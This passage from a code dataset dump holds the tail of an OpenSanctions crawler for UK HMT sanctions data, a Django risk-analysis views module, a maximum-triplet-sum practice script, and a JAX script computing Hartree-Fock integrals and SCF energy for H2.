= entity.create_birth_date()\n            birth_date.date = stringify(dob)\n\n        if fresh_value(seen, row, 'Town of Birth') or \\\n           fresh_value(seen, row, 'Country of Birth'):\n            birth_place = entity.create_birth_place()\n            birth_place.place = row.pop('Town of Birth')\n            birth_place.country = row.pop('Country of Birth')\n\n        addr = [row.pop('Address 1'), row.pop('Address 2'),\n                row.pop('Address 3'), row.pop('Address 4'),\n                row.pop('Address 5'), row.pop('Address 6')]\n        addr_ids = addr + [row.get('Post/Zip Code'), row.get('Post/Zip Code')]\n        row['_addr'] = ' '.join([a for a in addr_ids if len(a) > 0])\n        if fresh_value(seen, row, '_addr'):\n            address = entity.create_address()\n            address.country = row.pop('Country')\n            address.postal_code = row.pop('Post/Zip Code')\n            address.text = ', '.join([a for a in addr if len(a) > 0])\n\n        if fresh_value(seen, row, 'Passport Details'):\n            identifier = entity.create_identifier()\n            identifier.type = Identifier.TYPE_PASSPORT\n            identifier.number = row.pop('Passport Details')\n            identifier.country = row.get('Nationality')\n\n        if fresh_value(seen, row, 'NI Number'):\n            identifier = entity.create_identifier()\n            identifier.type = Identifier.TYPE_NATIONALID\n            identifier.number = row.pop('NI Number')\n            identifier.country = row.get('Nationality')\n\n        if fresh_value(seen, row, 'Nationality'):\n            has_match = False\n            text = row.pop('Nationality')\n            for name in text.split(')'):\n                code = name\n                if code is not None:\n                    nationality = entity.create_nationality()\n                    nationality.country = name\n                    has_match = True\n            if not has_match:\n                nationality = entity.create_nationality()\n                nationality.country = text\n    # pprint(entity.to_dict())\n    context.emit(data=entity.to_dict())\n\n\ndef parse(context, data):\n    groups = {}\n    res = context.http.rehash(data)\n\n    with open(res.file_path, 'r', encoding='iso-8859-1') as csvfile:\n        # ignore first line\n        next(csvfile)\n        for row in csv.DictReader(csvfile):\n            group = int(float(row.pop('Group ID')))\n            if group not in groups:\n                groups[group] = []\n            groups[group].append({k: stringify(v) if stringify(v) is not None else '' for k, v in row.items()})\n\n    for group, rows in groups.items():\n        context.emit(data={\n            'group': group,\n            'rows': rows\n        })\n","sub_path":"opensanctions/crawlers/gb_hmt_sanctions.py","file_name":"gb_hmt_sanctions.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"37008590","text":"from django.conf import settings\nfrom django import forms\nfrom django.db.models import Q\nfrom django.views.generic import FormView\nfrom django.http import HttpResponse, FileResponse\nfrom geonode.layers.models import Layer\nfrom risks.models import (RiskApp, FurtherResource, HazardType, AnalysisType, \n                           RiskAnalysis, DymensionInfo, Region, AdministrativeDivision,\n                           RiskAnalysisDymensionInfoAssociation)\nfrom risks.datasource import GeoserverDataSource\nfrom geonode.utils import json_response  # assumed source of json_response, which is used by RiskLayersView below but was never imported\n\n\nclass AppAware(object):\n    DEFAULT_APP = RiskApp.APP_DATA_EXTRACTION\n\n    def get_app_name(self):\n        return self.kwargs['app']\n\n    def get_app(self):\n        app_name = self.get_app_name()\n        return RiskApp.objects.get(name=app_name)\n\n\n
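# Usage sketch for the class below (hypothetical values): with kwargs ht='EQ' and\n# at='loss', get_context_url(ht='EQ', at='loss') returns 'ht/EQ/at/loss/'; keys are\n# consumed in CONTEXT_KEYS order and the chain stops at the first missing key.\n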
class ContextAware(AppAware):\n\n    CONTEXT_KEYS = ['ht', 'at', 'an', 'dym']\n\n    def get_context_url(self, **kwargs):\n        out = []\n        if kwargs.pop('_full', None):\n            ctx_keys = ['app', 'loc' ] + self.CONTEXT_KEYS\n        else:\n            ctx_keys = self.CONTEXT_KEYS\n        for k in ctx_keys:\n            if kwargs.get(k):\n                out.extend([k, kwargs[k]])\n            else:\n                break\n        if out:\n            url = '{}/'.format('/'.join(out))\n        else:\n            url = None\n        return url\n\n    def fr_for_an(self, an, **kwargs):\n        \"\"\"\n        .. py:method:: fr_for_an(an, **kwargs)\n\n        :param an: Risk Analysis object\n        :param dict kwargs: other parameters available\n        :type an: :py:class: rdh.risks.models.RiskAnalysis\n\n        Returns list of :py:class: rdh.risks.models.FurtherResource\n        related to Hazard type (assigned to Risk Analysis). Region may be used to narrow results.\n\n        \"\"\"\n        if an.hazardset is None:\n            return []\n        region = None\n        #if kwargs.get('loc'):\n        #region = kwargs['loc'].region\n        if kwargs.get('reg'):\n            region = kwargs['reg']\n\n        return FurtherResource.for_hazard_set(an.hazardset, region=region)\n\n\n    def fr_for_dym(self, dym, **kwargs):\n        \"\"\"\n        .. py:method:: fr_for_dym(dym, **kwargs)\n\n        :param dym: DymensionInfo object\n        :param dict kwargs: other parameters for query\n        :type dym: :py:class: rdh.risks.models.DymensionInfo\n\n        Returns list of :py:class: rdh.risks.models.FurtherResource\n        related to DymensionInfo. Region and Risk Analysis may be used to\n        narrow results.\n        \"\"\"\n\n\n        if dym is None:\n            return []\n        ranalysis = kwargs.get('an')\n        region = None\n        #if kwargs.get('loc'):\n        #region = kwargs['loc'].region\n        if kwargs.get('reg'):\n            region = kwargs['reg']\n        return FurtherResource.for_dymension_info(dym, region=region, ranalysis=ranalysis)\n\n\n    def fr_for_at(self, at, **kwargs):\n        \"\"\"\n        .. py:method:: fr_for_at(at, **kwargs)\n\n        :param at: AnalysisType object\n        :param dict kwargs: other parameters for query\n        :type at: :py:class: rdh.risks.models.AnalysisType\n\n        Returns list of :py:class: rdh.risks.models.FurtherResource\n        related to AnalysisType. Region and Hazard type may be used to\n        narrow results.\n        \"\"\"\n        if at is None:\n            return []\n        htype = kwargs.get('ht')\n        region = None\n        #if kwargs.get('loc'):\n        #region = kwargs['loc'].region\n        if kwargs.get('reg'):\n            region = kwargs['reg']\n        return FurtherResource.for_analysis_type(at, region=region, htype=htype)\n\n\n    # maps url captured argument to specific class and field for lookup\n    CONTEXT_KEYS_CLASSES = (('ht', HazardType, 'mnemonic'),\n                            ('at', AnalysisType, 'name',),\n                            ('an', RiskAnalysis, 'id',),\n                            ('dym', DymensionInfo, 'id',),\n                            ('reg', Region, 'name',),\n                            ('loc', AdministrativeDivision, 'code',)\n                            )\n\n\n    def get_further_resources_inputs(self, **kwargs):\n        \"\"\"\n        .. py:method:: get_further_resources_inputs(self, **kwargs)\n\n        :param dict kwargs: keyword arguments obtained from url parser\n        :return: dictionary with objects for keyword and criteria\n\n        This will check each pair of (key, value) from url kwargs and,\n        using map between key and class, will get specific object identified\n        by value.\n\n        \"\"\"\n\n        out = {}\n        for k, klass, field in self.CONTEXT_KEYS_CLASSES:\n            if not kwargs.get(k):\n                continue\n            related = self._get_from_kwargs(klass, field, kwargs[k])\n            out[k] = related\n        return out\n\n    def get_further_resources(self, **kwargs):\n        \"\"\"\n        .. 
py:method:: get_further_resources(self, **kwargs)\n\n returns map of criteria and further resources available for given criteria\n\n :param dict kwargs: keyword arguments obtained from url parser (see CONTEXT_KEY_CLASSES)\n :return: dictionary with object type name and list of related resources\n :rtype: dict\n\n \"\"\"\n inputs = kwargs.pop('inputs', None) or self.get_further_resources_inputs(**kwargs)\n out = {}\n for res_type, key_name in (('at', 'analysisType',),\n ('dym', 'hazardSet',),\n ('an', 'hazardType',)):\n res_type_handler = getattr(self, 'fr_for_{}'.format(res_type))\n if kwargs.get(res_type):\n res_list = res_type_handler(**inputs)\n out[key_name] = self._fr_serialize(res_list)\n return out\n\n\n def _fr_serialize(self, items):\n return [i.export() for i in items]\n\n def _get_from_kwargs(self, klass, field, field_val):\n app = self.get_app()\n kwargs = {field: field_val}\n if hasattr(klass, 'app'):\n kwargs['app'] = app\n return klass.objects.get(**kwargs)\n\n\nclass FeaturesSource(object):\n\n AXIS_X = 'x'\n AXIS_Y = 'y'\n KWARGS_MAPPING = {'loc': 'adm_code',\n 'ht': 'hazard_type',\n 'an': 'risk_analysis',\n 'evt': 'event_id'}\n\n def url_kwargs_to_query_params(self, **kwargs):\n out = {}\n for k, v in kwargs.iteritems():\n if self.KWARGS_MAPPING.get(k):\n new_k = self.KWARGS_MAPPING[k]\n out[new_k] = v\n return out\n\n def get_dim_association(self, analysis, dyminfo):\n ass_list = RiskAnalysisDymensionInfoAssociation.objects.filter(riskanalysis=analysis, dymensioninfo=dyminfo)\n dim_list = set([a.axis_to_dim() for a in ass_list])\n if len(dim_list) != 1:\n raise ValueError(\"Cannot query more than one dimension at the moment, got {}\".format(len(dim_list)))\n\n return (ass_list.first(), list(dim_list)[0])\n\n def get_dymlist_field_mapping(self, analysis, dimension, dymlist):\n out = []\n layers = [analysis.layer.typename]\n current_dim_name = self.get_dim_association(analysis, dimension)[1]\n out.append(current_dim_name)\n for dym in dymlist:\n if dym != dimension:\n dim_association = self.get_dim_association(analysis, dym)\n out.append(dim_association[1])\n return (out, layers)\n\n def get_features(self, analysis, dimension, dymlist, **kwargs):\n\n (dymlist_to_fields, dym_layers) = self.get_dymlist_field_mapping(analysis, dimension, dymlist)\n\n s = settings.OGC_SERVER['default']\n gs = GeoserverDataSource('{}/wfs'.format(s['LOCATION'].strip(\"/\")),\n username=s['USER'],\n password=s['PASSWORD']\n ) \n dim_name = dymlist_to_fields[0] \n layer_name = dym_layers[0] \n #if 'additional_data' in kwargs:\n # layer_name = '{}_{}'.format(layer_name, kwargs['additional_data'])\n #features = gs.get_features(layer_name, dim_name, **kwargs)\n features = gs.get_features(layer_name, None, **kwargs)\n return features\n\n def get_features_base(self, layerName, field_list, **kwargs):\n s = settings.OGC_SERVER['default']\n gs = GeoserverDataSource('{}/wfs'.format(s['LOCATION'].strip(\"/\")),\n username=s['USER'],\n password=s['PASSWORD']\n )\n features = gs.get_features(layerName, field_list, **kwargs)\n return features\n\n\nclass LocationSource(object):\n\n DEFAULT_LIMIT_RESULTS = 8\n \n def get_region(self, **kwargs):\n try:\n return Region.objects.get(name=kwargs['reg']) \n except Region.DoesNotExist:\n return\n\n def get_location_exact(self, loc):\n try:\n return AdministrativeDivision.objects.get(code=loc) \n except AdministrativeDivision.DoesNotExist:\n return None\n \n def get_location(self, **kwargs):\n loc = self.get_location_exact(kwargs['loc'])\n if loc: \n locations = 
loc.get_parents_chain() + [loc]\n return locations \n return None\n\n def get_location_range(self, loc):\n return AdministrativeDivision.objects.filter(code__in=loc) \n \n def location_lookup(self, **kwargs):\n #matches = AdministrativeDivision.objects.filter(name__icontains=kwargs['admlookup'])\n qstring = kwargs['admlookup']\n matches = AdministrativeDivision.objects.filter(\n Q(name=qstring) | Q(name__istartswith=qstring)\n ).extra(\n select={'match': 'name = %s'},\n select_params=(qstring,)\n ).order_by('-match', 'name')\n loc_chains = []\n if matches: \n limit = int(kwargs['limit']) if 'limit' in kwargs else self.DEFAULT_LIMIT_RESULTS\n for loc in matches[:limit]:\n loc_chains.append(loc.get_parents_chain() + [loc])\n return loc_chains\n\n\nclass LayersListForm(forms.Form):\n layers = forms.MultipleChoiceField(required=False, choices=())\n\n def get_layers(self):\n if not self.is_valid():\n return []\n d = self.cleaned_data\n return Layer.objects.filter(id__in=d['layers'])\n\n\nclass RiskLayersView(FormView):\n form_class = LayersListForm\n\n def get_risk(self):\n rid = self.kwargs['risk_id']\n try:\n return RiskAnalysis.objects.get(id=rid)\n except RiskAnalysis.DoesNotExist:\n pass\n\n def get_layer_choices(self):\n r = self.get_risk()\n if r.layer is None:\n q = Layer.objects.all().values_list('id', flat=True)\n else:\n q = Layer.objects.exclude(id=r.layer.id).values_list('id', flat=True)\n return [(str(val), str(val),) for val in q]\n\n def get_form(self, form_class=None):\n f = super(RiskLayersView, self).get_form(form_class)\n choices = self.get_layer_choices()\n f.fields['layers'].choices = choices\n return f\n\n\n def form_invalid(self, form):\n err = form.errors\n return json_response({'errors': err}, status=400)\n\n def form_valid(self, form):\n rid = self.kwargs['risk_id']\n risk = self.get_risk()\n if risk is None:\n return json_response({'errors': ['Invalid risk id']}, status=404)\n\n data = form.cleaned_data\n\n risk.additional_layers.clear()\n layers = form.get_layers()\n risk.additional_layers.add(*layers)\n risk.save()\n return self.get()\n\n\n def get(self, *args, **kwargs):\n rid = self.kwargs['risk_id']\n risk = self.get_risk()\n if risk is None:\n return json_response({'errors': ['Invalid risk id']}, status=404)\n out = {}\n out['success'] = True\n out['data'] = {'layers': list(risk.additional_layers.all().values_list('typename', flat=True))}\n return json_response(out)\n\n\nclass CleaningFileResponse(FileResponse):\n def __init__(self, *args, **kwargs):\n\n on_close = kwargs.pop('on_close', None)\n super(CleaningFileResponse, self).__init__(*args, **kwargs)\n self._on_close = on_close\n\n def close(self):\n print('closing', self)\n if callable(self._on_close):\n self._on_close()\n super(CleaningFileResponse, self).close()","sub_path":"risks/views/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":12472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"72752691","text":"\"\"\"\nGiven an array, the task is to find maximum triplet sum in the array.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. Each test case consists of two lines. 
The first line of each test case contains an integer N denoting the size of the array, and the second line contains N space-separated elements.\n\nOutput:\nFor each test case, print the maximum triplet sum on a new line.\n\nConstraints:\n1<=T<=100\n3<=N<=10^6\n-10^5<=A[i]<=10^5\n\nExample:\nInput:\n2\n6\n1 0 8 6 4 2\n7\n1 2 3 0 -1 8 10\nOutput:\n18\n21\n\"\"\"\n\n\ndef maximum_triplet_sum_in_array(arr, size):\n    arr = sorted(arr)\n    return sum(arr[size - 3:size])\n\n\nif __name__ == '__main__':\n    t = int(input())\n    for i in range(t):\n        size = int(input())\n        arr = [int(i) for i in input().split()][0:size]\n        print(maximum_triplet_sum_in_array(arr, size))\n","sub_path":"practice/Basic/maximum_triplet_sum_in_array.py","file_name":"maximum_triplet_sum_in_array.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"42691252","text":"import jax\nimport jax.numpy as np\nimport itertools as it\nimport numpy as onp\nfrom jax.config import config; config.update(\"jax_enable_x64\", True)\nnp.set_printoptions(linewidth=200)\n\ndef tei_setup(geom,basis):\n    nbf = basis.shape[0]\n    nbf_per_atom = int(nbf / 2)\n    G = np.ones((nbf,nbf,nbf,nbf))\n    #TODO\n    # NotImplementedError: np.repeat implementation only supports scalar repeats\n    #centers = np.repeat(geom, 32, axis=0) # TODO currently can only repeat each center the same number of times => only works when all atoms have the same # of basis functions\n    centers = np.repeat(geom, nbf_per_atom, axis=0) # TODO currently can only repeat each center the same number of times => only works when all atoms have the same # of basis functions\n    norm = (2 * basis / np.pi)**(3/4)\n    G *= np.einsum('i,j,k,l',norm,norm,norm,norm)\n    G *= (2 * np.pi**2)\n    # Obtain miscellaneous terms \n    # (i,l,j,k) + (l,i,j,k) ---> (i+l,i+l,j+j,k+k) ---> (A+D,D+A,C+C,B+B) which is just (A+D,A+D,C+C,B+B)\n    tmp1 = np.broadcast_to(basis, (nbf,nbf,nbf,nbf))\n    aa_plus_bb = tmp1.transpose((0,3,1,2)) + tmp1.transpose((3,0,1,2))\n    G *= (1 / (aa_plus_bb * aa_plus_bb.transpose((3,2,0,1))))\n    G *= np.sqrt(np.pi / (aa_plus_bb + aa_plus_bb.transpose((3,2,0,1))))\n    aa_times_bb = tmp1.transpose((0,3,1,2)) * tmp1.transpose((3,0,1,2))\n    # Obtain gaussian product coefficients\n    tmp2 = np.broadcast_to(centers, (nbf,nbf,nbf,nbf,3))\n    AminusB = tmp2.transpose((0,3,1,2,4)) - tmp2.transpose((3,0,1,2,4))\n    # 'dot' the cartesian dimension\n    contract_AminusB = np.einsum('ijklm,ijklm->ijkl', AminusB,AminusB)\n    c1 = np.exp(contract_AminusB * -aa_times_bb / aa_plus_bb)\n    G *= c1\n    G *= c1.transpose((2,3,0,1))\n    # Obtain gaussian product centers Rp = (aa * A + bb * B) / (aa + bb);  Rq = (cc * C + dd * D) / (cc + dd)\n    weighted_centers = np.einsum('ijkl,ijklm->ijklm', tmp1, tmp2)\n    tmpAB = weighted_centers.transpose((0,3,1,2,4)) + weighted_centers.transpose((3,0,1,2,4))\n    Rp_minus_Rq = np.einsum('ijklm,ijkl->ijklm', tmpAB, 1/aa_plus_bb) -\\\n                  np.einsum('ijklm,ijkl->ijklm', tmpAB.transpose((2,3,0,1,4)), 1/aa_plus_bb.transpose((3,2,0,1)))\n    boys_arg = np.einsum('ijklm,ijklm->ijkl', Rp_minus_Rq, Rp_minus_Rq) /\\\n               (1 / (aa_plus_bb) + 1 / (aa_plus_bb.transpose((3,2,0,1))))\n    boys_arg = jax.scipy.special.erf(np.sqrt(boys_arg + 1e-9)) * np.sqrt(np.pi) / (2 * np.sqrt(boys_arg + 1e-9))\n    G *= boys_arg\n    return G\n\n
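# Illustrative sanity check: a real s-orbital ERI tensor has 8-fold permutational\n# symmetry, so tei_setup's result should satisfy, up to floating-point error:\n#   G = tei_setup(geom, basis)\n#   assert np.allclose(G, np.transpose(G, (1, 0, 2, 3)))  # (ij|kl) == (ji|kl)\n#   assert np.allclose(G, np.transpose(G, (2, 3, 0, 1)))  # (ij|kl) == (kl|ij)\n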
@jax.jit\ndef normalize(aa):\n    '''Normalization constant for s primitive basis functions. Argument is the orbital exponent coefficient'''\n    aa = ((2*aa)/np.pi)**(3/4)\n    return aa\n\n@jax.jarrett\ndef boys_eval(arg):\n    return jax.scipy.special.erf(np.sqrt(arg + 1e-9)) * np.sqrt(np.pi) / (2 * np.sqrt(arg + 1e-9))\n\n@jax.jit\ndef eri(aa,bb,cc,dd,A,B,C,D):\n    '''Computes a single two electron integral over 4 s-orbital basis functions on 4 centers'''\n    g1 = aa + bb\n    g2 = cc + dd\n    Rp = (aa * A + bb * B) / (aa + bb)\n    tmpc1 = np.dot(A-B, A-B) * ((-aa * bb) / (aa + bb))\n    c1 = np.exp(tmpc1)\n    Rq = (cc * C + dd * D) / (cc + dd)\n    tmpc2 = np.dot(C-D, C-D) * ((-cc * dd) / (cc + dd))\n    c2 = np.exp(tmpc2)\n\n    Na, Nb, Nc, Nd = normalize(aa), normalize(bb), normalize(cc), normalize(dd)\n    delta = 1 / (4 * g1) + 1 / (4 * g2)\n    arg = np.dot(Rp - Rq, Rp - Rq) / (4 * delta)\n    F = boys_eval(arg)\n    G = F * Na * Nb * Nc * Nd * c1 * c2 * 2 * np.pi**2 / (g1 * g2) * np.sqrt(np.pi / (g1 + g2))\n    return G\n\ndef find_indices(nbf):\n    '''Find a set of indices of ERI tensor corresponding to unique two-electron integrals'''\n    v = onp.arange(nbf)\n    indices = cartesian_product(v,v,v,v)\n    cond1 = indices[:,0] >= indices[:,1]\n    cond2 = indices[:,2] >= indices[:,3]\n    cond3 = indices[:,0] * (indices[:,0] + 1) / 2 + indices[:,1] >= indices[:,2]*(indices[:,2]+1)/2 + indices[:,3]\n    mask = cond1 & cond2 & cond3\n    return np.asarray(indices[mask,:])\n\ndef cartesian_product(*arrays):\n    '''Find all indices of ERI tensor given 4 arrays \n    (np.arange(nbf), np.arange(nbf), np.arange(nbf), np.arange(nbf)) '''\n    la = len(arrays)\n    dtype = onp.result_type(*arrays)\n    arr = onp.empty([len(a) for a in arrays] + [la], dtype=dtype)\n    #arr = onp.empty([len(a) for a in arrays] + [la])\n    for i, a in enumerate(onp.ix_(*arrays)):\n        arr[...,i] = a\n    return arr.reshape(-1, la)\n\ndef permute(arr):\n    p1 = onp.array([0,1,2,3])\n    p2 = onp.array([2,3,0,1]) \n    p3 = onp.array([1,0,3,2]) \n    p4 = onp.array([3,2,1,0])\n    p5 = onp.array([1,0,2,3])\n    p6 = onp.array([3,2,0,1])\n    p7 = onp.array([0,1,3,2])\n    p8 = onp.array([2,3,1,0])\n    permutations = np.vstack((arr[p1],arr[p2],arr[p3],arr[p4],arr[p5],arr[p6],arr[p7],arr[p8]))\n    uniques = onp.unique(permutations,axis=0)\n    return uniques.shape[0]\n\n\ndef fast_tei(geom,basis):\n    nbf = basis.shape[0]\n    nbf_per_atom = int(nbf / 2)\n    centers = np.repeat(geom, nbf_per_atom, axis=0) # TODO currently can only repeat each center the same number of times => only works when all atoms have the same # of basis functions\n    indices = find_indices(nbf)\n\n    # Compute unique ERIs\n    def compute_eri(idx):\n        i,j,k,l = idx\n        tei = eri(basis[i], basis[j], basis[k], basis[l], centers[i], centers[j], centers[k], centers[l])\n        return tei\n    vectorized_eri = jax.jit(jax.vmap(compute_eri, (0,)))\n    unique_teis = vectorized_eri(indices)\n\n#this works, but is it memory inefficient due to making all these intermediates?\n#    I = jax.ops.index_update(I, (np.hstack((indices[:,0],indices[:,2],indices[:,1],indices[:,3],indices[:,1],indices[:,3],indices[:,0],indices[:,2])), \n#                                 np.hstack((indices[:,1],indices[:,3],indices[:,0],indices[:,2],indices[:,0],indices[:,2],indices[:,1],indices[:,3])),\n#                                 np.hstack((indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1])),\n#                                 np.hstack((indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0]))),np.tile(unique_teis,8))\n\n#This also works, apparently same memory requirement as above?\n#    I = jax.ops.index_update(I, 
(np.hstack((indices[:,0],indices[:,2],indices[:,1],indices[:,3],indices[:,1],indices[:,3],indices[:,0],indices[:,2])), \n#                                 np.hstack((indices[:,1],indices[:,3],indices[:,0],indices[:,2],indices[:,0],indices[:,2],indices[:,1],indices[:,3])),\n#                                 np.hstack((indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1])),\n#                                 np.hstack((indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0]))),np.broadcast_to(unique_teis, (8,unique_teis.shape[0])).flatten())\n\n# best so far, though still a lot of redundancy; index 0,0,0,0 for instance gets assigned a value 8 times.\n    @jax.jit\n    def fill_I():\n        I = np.empty((nbf,nbf,nbf,nbf))\n        I = jax.ops.index_update(I, ((indices[:,0],indices[:,2],indices[:,1],indices[:,3],indices[:,1],indices[:,3],indices[:,0],indices[:,2]), \n                                     (indices[:,1],indices[:,3],indices[:,0],indices[:,2],indices[:,0],indices[:,2],indices[:,1],indices[:,3]),\n                                     (indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1]),\n                                     (indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0])),np.broadcast_to(unique_teis, (8,unique_teis.shape[0])))\n        return I\n    I = fill_I()\n    return I\n\ndef oei(geom,basis,nbf_per_atom,charge_per_atom):\n    # SETUP AND OVERLAP INTEGRALS\n    nbf = basis.shape[0]\n    centers = np.repeat(geom, nbf_per_atom, axis=0) # TODO currently can only repeat each center the same number of times => only works when all atoms have the same # of basis functions\n    #centers = np.repeat(geom, [4,4], axis=0) # TODO currently can only repeat each center the same number of times => only works when all atoms have the same # of basis functions\n    # Construct Normalization constant product array, Na * Nb component\n    norm = (2 * basis / np.pi)**(3/4)\n    normtensor = np.outer(norm,norm) # outer product => every possible combination of Na * Nb\n    # Construct pi / aa + bb ** 3/2 term\n    aa_times_bb = np.outer(basis,basis)\n    #aa_plus_bb = basis.expand(nbf,-1) + torch.transpose(basis.expand(nbf,-1),0,1) # doesn't copy data, unlike repeat(). may not work, but very efficient\n    aa_plus_bb = np.broadcast_to(basis, (nbf,nbf)) + np.transpose(np.broadcast_to(basis, (nbf,nbf)), (1,0))\n    term = (np.pi / aa_plus_bb) ** (3/2)\n    ## Construct gaussian product coefficient array, c = exp(A-B dot A-B) * ((-aa * bb) / (aa + bb))\n    tmpA = np.broadcast_to(centers, (nbf,nbf,3))\n    AminusB = tmpA - np.transpose(tmpA, (1,0,2)) #caution: transpose shares memory with original array. 
changing one changes the other\n AmBAmB = np.einsum('ijk,ijk->ij', AminusB, AminusB)\n coeff = np.exp(AmBAmB * (-aa_times_bb / aa_plus_bb))\n S = normtensor * coeff * term\n # KINETIC INTEGRALS\n P = aa_times_bb / aa_plus_bb\n T = S * (3 * P + 2 * P * P * -AmBAmB)\n # Construct gaussian product center array, R = (aa * A + bb * B) / (aa + bb)\n # First construct every possible sum of exponential-weighted cartesian centers, aa*A + bb*B \n aatimesA = np.einsum('i,ij->ij', basis,centers)\n # This is a 3D tensor (nbf,nbf,3), where each row is a unique sum of two exponent-weighted cartesian centers\n numerator = aatimesA[:,None,:] + aatimesA[None,:,:]\n R = np.einsum('ijk,ij->ijk', numerator, 1/aa_plus_bb)\n ## Now we must subtract off the atomic coordinates, for each atom, introducing yet another dimension, where we expand according to number of atoms\n R_per_atom = np.broadcast_to(R, (geom.shape[0],) + R.shape)\n expanded_geom = np.transpose(np.broadcast_to(geom, (nbf,nbf) + geom.shape), (2,1,0,3))\n # Subtract off atom coordinates\n Rminusgeom = R_per_atom - expanded_geom\n # Now contract along the coordinate dimension, and weight by aa_plus_bb. This is the boys function argument.\n contracted = np.einsum('ijkl,ijkl->ijk', Rminusgeom,Rminusgeom)\n boys_arg = np.einsum('ijk,jk->ijk', contracted, aa_plus_bb)\n #Vtmp = normtensor * coeff * 2 * np.pi / aa_plus_bb\n #boys_arg = jax.scipy.special.erf(np.sqrt(boys_arg + 1e-9)) * np.sqrt(np.pi) / (2 * np.sqrt(boys_arg + 1e-9))\n boys_arg = boys_eval(boys_arg) \n Fcharge = -charge_per_atom[:,None,None] * boys_arg[:,...]\n Ffinal = np.sum(Fcharge, axis=0)\n V = normtensor * coeff * 2 * np.pi / aa_plus_bb * Ffinal\n return S, T, V\n\ndef nuclear_repulsion(atom1, atom2):\n ''' warning : hard coded for H2'''\n Za = 1.0\n Zb = 1.0\n return Za*Zb / np.linalg.norm(atom1-atom2)\n\ndef orthogonalizer(S):\n '''Compute overlap to the negative 1/2 power'''\n # STABLE FOR SMALL EIGENVALUES\n #eigval, eigvec = np.linalg.eigh(S)\n #cutoff = 1.0e-12\n #above_cutoff = (abs(eigval) > cutoff * np.max(abs(eigval)))\n #val = 1 / np.sqrt(eigval[above_cutoff])\n #vec = eigvec[:, above_cutoff]\n #A = vec.dot(np.diag(val)).dot(vec.T)\n\n ### STABLE FOR SMALL EIGENVALUES\n eigval, eigvec = np.linalg.eigh(S)\n #cutoff = 1.0e-12\n #above_cutoff = (abs(eigval) > cutoff * np.max(abs(eigval)))\n #TODO TODO hard coded\n val = 1 / np.sqrt(eigval[-8:])\n vec = eigvec[:, -8:]\n A = vec.dot(np.diag(val)).dot(vec.T)\n return A\n\n#geom = np.array([0.000000000000,0.000000000000,-0.849220457955,0.000000000000,0.000000000000,0.849220457955]).reshape(-1,3)\ngeom = np.array([0.000000000000,0.000000000000,-0.8492204,0.000000000000,0.000000000000,0.8492204]).reshape(-1,3)\n\n#atom1_basis = np.repeat(np.array([0.5, 0.4, 0.3, 0.2]),8)\n#atom2_basis = np.repeat(np.array([0.5, 0.4, 0.3, 0.2]),8)\n#atom1_basis = np.array([0.5, 0.4, 0.3, 0.2])\n#atom2_basis = np.array([0.5, 0.4, 0.3, 0.2])\n#atom1_basis = np.array([0.5, 0.4])\n#atom2_basis = np.array([0.5, 0.4])\natom1_basis = np.array([0.5])\natom2_basis = np.array([0.4])\nbasis = np.concatenate((atom1_basis, atom2_basis))\nprint(basis.shape)\n#centers = np.concatenate((np.tile(geom[0],atom1_basis.size).reshape(-1,3), np.tile(geom[1],atom2_basis.size).reshape(-1,3)))\nnbf_per_atom = np.array([atom1_basis.shape[0],atom2_basis.shape[0]])\ncharge_per_atom = np.array([1.0,1.0])\n\n#@jax.jit\ndef hartree_fock_iter(D, A, H, G, Enuc):\n ndocc = 1\n J = np.einsum('pqrs,rs->pq', G, D)\n print(J.flatten())\n K = np.einsum('prqs,rs->pq', G, D)\n F = H + J * 2 
- K\n    E_scf = np.einsum('pq,pq->', F + H, D) + Enuc\n    print(E_scf)\n    Fp = A.dot(F).dot(A)\n    eps, C2 = np.linalg.eigh(Fp)\n    C = np.dot(A, C2)\n    Cocc = C[:, :ndocc]\n    D = np.einsum('pi,qi->pq', Cocc, Cocc)\n    return E_scf, D\n\ndef hartree_fock(geom):\n    S,T,V = oei(geom,basis,nbf_per_atom,charge_per_atom)\n    G = fast_tei(geom,basis) \n    #G = tei_setup(geom,basis)\n    H = T + V\n    A = orthogonalizer(S)\n    Enuc = nuclear_repulsion(geom[0],geom[1])\n    D = np.zeros_like(H)\n\n    for i in range(12):\n    #for i in range(1):\n        E_scf, D = hartree_fock_iter(D, A, H, G, Enuc)\n    return E_scf\n\n\nE = hartree_fock(geom)\n#print(E)\n#gradfunc = jax.jacrev(hartree_fock)\ngradfunc = jax.jacfwd(hartree_fock)  # uncommented: the gradient call below needs gradfunc defined\n#hessfunc = jax.jacfwd(gradfunc)\n#cubefunc = jax.jacfwd(hessfunc)\n\n#G = fast_tei(geom,basis)\n#print(G.shape)\n#Ggrad = jax.jacfwd(fast_tei)(geom,basis)\n#print(Ggrad.shape)\n#jax.jacfwd(jax.jacfwd(jax.jacfwd(fast_tei)))(geom,basis)\n#print(Gcube.shape)\n\n#hessfunc = jax.jit(jax.jacfwd(jax.jacfwd(hartree_fock)))\n#cubefunc = jax.jacfwd(jax.jacfwd(jax.jacfwd(hartree_fock)))\n\n#E = other_hartree_fock(geom)\n#gradfunc = jax.jacrev(other_hartree_fock)\n#hessfunc = jax.jacfwd(gradfunc)\n#cubefunc = jax.jacfwd(hessfunc)\n\n#quarfunc = jax.jacfwd(cubefunc)\n
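# Since hartree_fock is pure JAX, jax.jacfwd/jax.jacrev differentiate it w.r.t. geom\n# to give nuclear gradients, and nesting them (e.g. jax.jacfwd(jax.jacfwd(hartree_fock)))\n# yields Hessians, cubics, etc., which is what the commented-out lines above sketch.\n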
